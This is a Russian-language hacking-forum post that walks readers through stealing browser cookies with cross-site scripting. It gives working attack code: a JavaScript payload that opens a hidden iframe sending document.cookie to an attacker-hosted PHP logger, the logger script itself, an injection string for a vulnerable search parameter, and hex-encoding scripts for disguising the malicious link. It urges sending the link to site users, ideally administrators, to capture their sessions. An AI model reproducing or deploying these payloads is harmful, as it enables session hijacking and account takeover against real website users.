![]() |
|
| Правила Форума редакция от 22.06.2020 |
|
|||||||
|
|
Окажите посильную поддержку, мы очень надеемся на вас. Реквизиты для переводов ниже. |
|
![]() |
|
|
Опции темы | Опции просмотра |
Language
|
|
|
#1
|
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|
Автор: Jenizix, WHB (Web-Hack Board)
Ну найти в интернете описание XSS-бага я думаю труда не составит... Перейдем сразу к использованию: -= 3-2-1 go! =- Сначала зарегистрируем ( или возьмем имеющийся ) домен с хостингом ( пофиг какого уровня =)))) ) с поддержкой PHP... допустим мы зарегили xss.host.ru... Создадим файл xss.js с таким содержимым: Код:
document.write('<iframe width=1 height=1 style="position: absolute; visibility: hidden;" src="'+'http://xss.host.ru/xss.php'+'?['+location.host+']:'+document.cookie+'"></iframe>');
Этот JavаScript будет открывать невидимый iframe на странице, в котором будет гризиться наш скрипт принимающий куки... + ему будет передаваться имя сайта откуда куки были стырены. Я выбрал тег <iframe> т.к. у некоторых отключен показ рисунков => тег <img> не прокатит... да и попапы могут резаться... Теперь создадим файл xss.php: Код:
<?
$file = fopen("cookies","a");
fputs($file,"[".date("d.m.y H:i")."]".$QUERY_STRING."\r\n");
fclose($file);
?>
Закинем оба файла в веб-директорию нашего сайта... ну вощем чтоб они были доступны как
и
-= Боевые действия =- Ну теперь найдем бажный сайт с XSS уязвимостью. Допустим уязвимость будет тут:
ок. уязвимость есть. пошлем скрипту find.php запрос типа Код:
find.php?find=<script src=http://xss.host.ru/xss.js></script>
и видим стырены куки! =))) -= Шифруемся =- НО! В открытую этот линк кидать не стоит... палевно... сделаем так, напишем php-скрипт для кодировки символов в hex и для разкодировки из hex: hex.php: Код:
<?
$str = urldecode($_SERVER['QUERY_STRING']);
for($i=0;$i<strlen($str);$i++) {
$hex=dechex(ord($str[$i]));
if($str[$i]=='&')
echo "$str[$i]";
else
echo "%$hex";
}
?>
Код:
<? echo urldecode($_SERVER['QUERY_STRING']); ?> например нам нужно чтобы юзер прошелся по этой ссылке:
но как я уже говорил, в открытую ее ему кидать - палевно... заюзаем наш hex.php:
Получим вот что:
это hex представление текста: <script src=http://xss.host.ru/xss.js></script> Теперь наша ссылка будет выглядеть вот так:
Как видите, не очень и палиться =))) Теперь осталось скинуть этот линк какомунибудь юзеру ( а лучше админу ) сайта site.ru и ждать его куков ( если конечно они там юзаются )... Куки могут быть в hex-виде... тут нам придет на помощ unhex.php:
-= Подводим итоги =- Теперь у нас есть полноценные скрипты для проведения XSS-атаки. Еще можно наш xss.js прогнать через hex.php чтоб еще побольше обезопаситься )))
__________________
Sometimes the life chooses for us.. Если человек идиот он должен знать об этом. (c) me Последний раз редактировалось WeNZeeR; 31.07.2007 в 13:18.. |
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|
|
|
| Эти 10 пользователя(ей) сказали cпасибо за это полезное сообщение: |
| Реклама: | смотреть фильм последнее завтра | Декоративные браслеты из серебра | Магазин бытовой техники: телевизор 32 дюймов самсунг купить - переходи на сайт ТАЙМТВ! | двигатель ва100s4 | регулярный теплоходный маршрут нижний новгород самара |
![]() |
Похожие темы
|
||||
| Тема | Автор | Раздел | Ответов | Последнее сообщение |
| Статья 12.15 ч.1 | DI__MON | Административное право | 9 | 14.10.2009 06:43 |
| Русский рукопашный бой [Введение] | Meverik | Различные ссылки | 1 | 09.10.2005 14:36 |
|
|